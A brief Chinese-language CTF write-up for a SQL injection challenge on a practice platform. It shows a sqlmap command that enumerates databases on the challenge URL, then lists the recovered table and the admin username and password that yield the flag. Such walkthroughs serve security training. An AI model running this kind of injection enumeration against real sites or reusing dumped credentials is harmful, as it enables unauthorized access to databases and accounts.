1. 程式人生 > >ctf解題--看起來有點難

ctf解題--看起來有點難

題目

解題

sqlmap.py -u "http://ctf1.shiyanbar.com/basic/inject/index.php?admin=&pass=&action=login" --dbs 
  • 查表(有username與password欄位)
    test庫
    admin表

  • 查值
    username 為 admin
    password為 idnuenna
    直接表單提交即可得到flag。